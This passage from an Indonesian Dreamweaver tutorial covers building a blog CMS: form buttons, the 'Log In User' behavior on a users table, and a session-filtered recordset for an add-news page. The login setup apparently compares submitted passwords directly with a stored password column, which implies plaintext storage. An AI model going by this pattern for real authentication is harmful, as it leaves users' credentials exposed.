- ID: submit, biarkan Label-nya kosong. Klik OK
- Klik tombol Submit tersebut, lalu Copy, letakkan kursor Anda di samping kanan dari tombol tersebut, lalu Paste
- Klik tombol Submit yang baru saja Anda Paste tadi, lalu melalui panel Properties ubah menjadi Reset form
- Simpan kembali hasil pekerjaan Anda.
- Mengaktifkan form login
Mengaktifkan form login
Langkah selanjutnya adalah mengaktifkan form login sehingga dapat digunakan dengan baik. Berikut adalah langkah-langkahnya:- Pastikan file login.php masih Anda buka
- Klik Insert > Data Objects > User Authentication > Log In User. Jendela Log In User akan muncul. Lakukan konfigurasi seperti di bawah ini.
- Get input from form: form1
- Username field: username
- Password field: password
- Validate using connection: cms_blog, klik pop-up menu untuk memilihnya
- Table: users
- Username column: username
- Password column: password
- If login succeds, go to: index.php, ini artinya jika proses login Anda sukses dan benar, maka Anda akan dialihkan ke halaman index.php. Anda dapat mengklik Browse untuk mencari file index.php
- Beri tanda checked/centang pada pilihan Go to previous URL (If exists)
- If login fails, go to: login.php. Ini artinya ketika proses login Anda mengalami kegagalan, Anda akan dikembalikan ke halaman login.
- Klik OK untuk menyelesaiakannya. Simpan kembali pekerjaan Anda.
- Halaman login telah berhasil Anda selesaikan. Jika muncul jendela peringantan Copy Dependent File, klik OK saja
Membuat form tambah berita dan mengaktifkannya (add-news.php)
Anda telah dapat melindungi halaman admin dengan username dan password. Anda juga telah dapat menambahkan dan mengaktifkan link Log Out. Langkah berikutnya adalah bagian utama dari tutorial ini, yaitu aplikasi berita. Akan ada 3 tahap dalam hal ini, yaitu:- Menampilkan data login, sehingga nantinya siapa yang melakukan posting dan edit berita akan terekam secara otomatis
- Membuat form tambah berita
- Mengaktifkan form tambah berita
- Buka file add-news.php
- Klik Insert > Data Objects > Recordset. Jendela Recordset akan muncul
- Name: rsSession (ubahlah defaultnya yang semula Recordset1 menjadi rsSession)
- Connection: cms_blog
- Table: users
- Columns: All
- Filter: username
- Ubah URL Parameter menjadi Session Variable
- Ubah tulisan username menjadi MM_Username (perhatikan besar kecil huruf)
- Klik OK untuk menyelesaikannya.
- Simpan kembali hasil pekerjaan Anda.
Tag :
Belajar Web,